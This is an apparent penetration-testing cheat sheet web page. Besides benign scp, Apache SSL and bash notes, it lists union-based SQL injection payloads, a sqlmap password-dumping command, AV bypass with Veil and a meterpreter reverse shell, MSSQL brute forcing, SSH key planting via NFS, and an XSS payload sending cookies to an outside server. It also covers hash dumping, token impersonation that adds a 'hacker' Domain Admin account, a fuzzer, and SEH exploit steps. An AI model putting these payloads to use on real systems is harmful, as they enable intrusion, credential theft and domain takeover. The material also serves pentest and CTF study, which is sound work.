CheatSheet

SCP

Secure Copy (scp) Cheatsheet

  • Copy remote file to local host
  • Copy local file to remote host
  • Copy local directory to remote directory
  • Copy a file from one remote host to another
  • Improve scp performance (use blowfish)

SQL Injection

Union Based SQL Injection

' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users

sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

AV bypass

1. Generate the executable using Veil.
2. In msfconsole set up psexec with the relevant payload (windows/meterpreter/reverse_tcp), then follow these steps:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip
RHOST => ip
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

Apache SSL

Enabling self-signed certificates on a local website.

1. Install OpenSSL:
sudo apt-get install openssl
2. Run the following command to generate the self-signed SSL certificate and key:
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable SSL for Apache:
sudo a2enmod ssl
4. Make the default-ssl site available by creating a symbolic link:
sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf:
sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
Change the following lines to point to the certs:
SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache:
sudo /etc/init.d/apache2 restart

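A check worth running after the certificate is generated, added here as an example and not part of the original page: it runs the page's openssl command into a scratch directory (the -subj value is an assumption so the command needs no interactive prompts), then confirms the certificate's public key matches the private key and that the key file is not readable by other users.

```shell
#!/bin/sh
# Added example (not from the original page). Generates the self-signed pair
# with the page's openssl options into a scratch directory, then checks the
# two things that most often break an SSL VirtualHost: a key that does not
# belong to the certificate, and a private key left world-readable.
set -eu

gen_and_verify() {
    dir=$(mktemp -d)
    crt="$dir/server.crt"
    key="$dir/server.key"

    # Same options as the page's command; -subj is an assumption added so
    # the command runs without interactive prompts.
    openssl req -x509 -nodes -days 1095 -newkey rsa:2048 \
        -subj "/CN=localhost" -out "$crt" -keyout "$key" 2>/dev/null

    # Apache reads the key as root at startup; nobody else needs it.
    chmod 600 "$key"

    # The public key embedded in the certificate must equal the one derived
    # from the private key, otherwise Apache fails with a key mismatch.
    crt_pub=$(openssl x509 -in "$crt" -noout -pubkey)
    key_pub=$(openssl pkey -in "$key" -pubout 2>/dev/null)
    if [ "$crt_pub" != "$key_pub" ]; then
        echo "certificate and key do not match" >&2
        rm -rf "$dir"
        return 1
    fi

    # The permission string from ls is portable where stat's flags are not.
    mode=$(ls -l "$key" | cut -c1-10)
    if [ "$mode" != "-rw-------" ]; then
        echo "private key is readable by others: $mode" >&2
        rm -rf "$dir"
        return 1
    fi

    # Still within the 1095-day validity period (not expired).
    openssl x509 -in "$crt" -noout -checkend 0 >/dev/null || { rm -rf "$dir"; return 1; }

    rm -rf "$dir"
    return 0
}
```

The same two checks apply to the real files under /etc/ssl once the paths are substituted.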
Attacking MS-SQL

Attacking MSSQL with Metasploit

  • Enumerate MSSQL servers on the network:
    msf > use auxiliary/scanner/mssql/mssql_ping
    nmap -sU --script=ms-sql-info ip

  • Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
  • Bruteforce the MSSQL database:
    msf > use auxiliary/scanner/mssql/mssql_login

  • Enumerate the MSSQL database:
    msf > use auxiliary/admin/mssql/mssql_enum

  • Gain a shell using the gathered credentials:
    msf > use exploit/windows/mssql/mssql_payload
    msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp


Bash Scripting

Simple Bash Scripting Cheatsheet

  • ctrl + y: Navigate to the previous page in nano.
  • ctrl + w: Find/search for a specific term in nano.
  • ctrl + k: Cut the current line of text in nano.
  • ctrl + x: Exit the nano editor.
  • touch file: create a new text file named "file".
  • nano file: open the nano editor with the file named "file".
  • ifconfig > tmp: execute the ifconfig command and save its output to the file "tmp".
  • echo >> tmp; ping google.com -c3 >> tmp: append a blank line and then the output of the "ping" command to the file "tmp".
  • cat file: display the contents of the file "file".
  • more file: display the contents of the file "file" one page at a time.
  • head file: display the first 10 lines of the file "file".
  • head -15 file: display the first 15 lines of the file "file".
  • tail file: display the last 10 lines of the file "file".
  • tail -15 file: display the last 15 lines of the file "file".
  • tail -f file: continuously display the output of the file "file" (useful for log files).
  • cat tmp | grep Bcast: pipe the output of "cat tmp" to the grep command, searching for "Bcast".
  • ps aux: display all running processes for all users.
  • kill -9 PID: forcefully terminate the process with the specified PID.
  • wc -l tmp2: count the number of lines in the file "tmp2".
  • cut -d delimiter -f fields: cut fields from lines of a file based on a delimiter.
  • sort -u file: sort the contents of the file "file" and remove duplicates.
  • sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n: sort IP addresses correctly.
  • awk '{print $1}' file: display the first column of the file "file".
  • awk '{print $1,$5}' file: display the first and fifth columns of the file "file".
  • grep -v 'string' file: display lines from the file "file" that do not contain the specified string.
  • egrep -v '(string1|string2|string3)' file: display lines from the file "file" that do not contain multiple specified strings.
  • sed 's/FOO/BAR/g' file: replace all occurrences of "FOO" with "BAR" in the file "file".
  • sed 's/FOO//g' file: remove all occurrences of "FOO" from the file "file".
  • sed '/^FOO/d' file: remove lines from the file "file" that start with "FOO".
  • Set text color: echo -e "\e[1;34m This is a blue text.\e[0m"

Bash Scripts

  • Simple bash script
#!/bin/bash
echo "Hello world."
  • Make a file executable
chmod +x file
or
chmod 755 file
  • Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.
  • IP Address
#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)
echo "Hello" $name "Your IP address is:" $ip
  • User Input
#!/bin/bash
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 "$domain"
  • Check For No User Input
#!/bin/bash
read -p "Domain:" domain
# Quote the variable: with an empty, unquoted $domain the test collapses to "[ -z ]"
if [ -z "$domain" ]; then
echo "#########################"
echo "Invalid choice."
exit 1
fi
  • For loops
#!/bin/bash
for host in $(cat hosts.txt)
do
command "$host"
done
  • One Liners
Port Scan
for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done
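A hardened version of the page's User Input and Check For No User Input scripts, added here as an example and not taken from the original page: it validates the value before it reaches ping and wraps the page's numeric IP sort as a reusable filter. The --run flag that gates the interactive part is an assumption of this example.

```shell
#!/bin/sh
# Added example, not from the original page. The page's scripts pass $domain
# to ping unquoted and only test for emptiness, so a value with spaces, a
# leading "-" or shell metacharacters changes the command that runs.
set -eu

# Accept a hostname or dotted-quad IPv4 address; reject anything else.
# A whitelist of characters is safer than trying to blacklist bad ones.
validate_host() {
    host="$1"
    [ -n "$host" ] || return 1
    [ "${#host}" -le 253 ] || return 1
    case "$host" in
        *[!A-Za-z0-9.-]*) return 1 ;;   # any character outside the whitelist
        .*|-*) return 1 ;;              # leading "-" would be read as an option
    esac
    return 0
}

# The page's sort invocation wrapped as a filter: numeric sort on each octet,
# duplicates removed (stdin to stdout).
sort_ips() {
    sort -u -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
}

main() {
    printf 'Please input your domain: '
    read -r domain
    if ! validate_host "$domain"; then
        echo "#########################"
        echo "Invalid choice."
        exit 1
    fi
    # "--" ends option parsing so the value can never be taken as a flag.
    ping -c 5 -- "$domain"
}

# Only the interactive part is gated, so the functions can be sourced elsewhere.
if [ "${1:-}" = "--run" ]; then
    main
fi
```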

CTF Notes

  • Enumerate users via finger.
  • Show available NFS shares:
    showmount -e ip

  • Use nfspysh to mount the share and create a .ssh directory:
    nfspysh -o server=ip:/home/user
    mkdir .ssh
    cd .ssh

  • Generate an ssh key pair:
    ssh-keygen
    cp id_rsa.pub /tmp/authorized_keys

  • Transfer the attacker's public key to the host:
    put /tmp/authorized_keys
    exit

  • Login to the SSH server with no password.

  • Start a web service:
    python -m SimpleHTTPServer 80

  • Use one of the following XSS payloads:
    <script>
        document.write('<img src="http://your_server.com/steal_cookie.php?cookie=' + document.cookie + '">');
    </script>

Domain Admin Exploitation

After compromising a Windows machine:

  • List the domain administrators:
    From Shell - net group "Domain Admins" /domain
    
  • Dump the hashes (Metasploit)
    msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
    
  • Find the admins (Metasploit)
    spool /tmp/enumdomainusers.txt
    msf > use auxiliary/scanner/smb/smb_enumusers_domain
    msf > set smbuser Administrator
    msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    msf > set rhosts ip/24
    msf > set threads 8
    msf > run
    msf > spool off
    

Compromise Admin's box

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain

Exploit Development Cheatsheet

Fuzzing

import socket

# Build a list of test strings: "A", then 50, 100, 150 ... bytes of "A".
# len(buffer) counts strings, so this keeps going until 1001 strings exist
# (the last one 50000 bytes long).
buffer = ["A"]
counter = 50
while len(buffer) <= 1000:
    buffer.append("A" * counter)
    counter = counter + 50

# Send each string to the target service in a fresh connection; the length
# printed last before the service stops responding is the crash size.
for buffstring in buffer:
    print("Fuzzing: " + str(len(buffstring)))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("192.168.0.20", 5555))
    sock.send(buffstring.encode())
    sock.close()

Bad Character Testing:

badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e"
"\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d"
"\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c"
"\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b"
"\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59"
"\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86"
"\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95"
"\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4"
"\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3"
"\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
"\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe"
"\xff"
)

Structured Exception Handler (SEH) Exploitation notes

  • Crash the application.
  • Check for an SEH overwrite (View > SEH chain).
  • Find the offset (!mona pattern_create ).
  • Find SEH references to the cyclic pattern (!mona findmsp) and verify the offset to nSEH (the Next SEH record pointer).
  • Find a POP/POP/RET address with mona (!mona seh -cpb ).
  • Add a short jump to the payload to jump over the SEH record ("\xeb\x06" + 2 bytes of padding).
  • Add shellcode to the payload.
  • Keep the existing padding to make sure the crash still happens.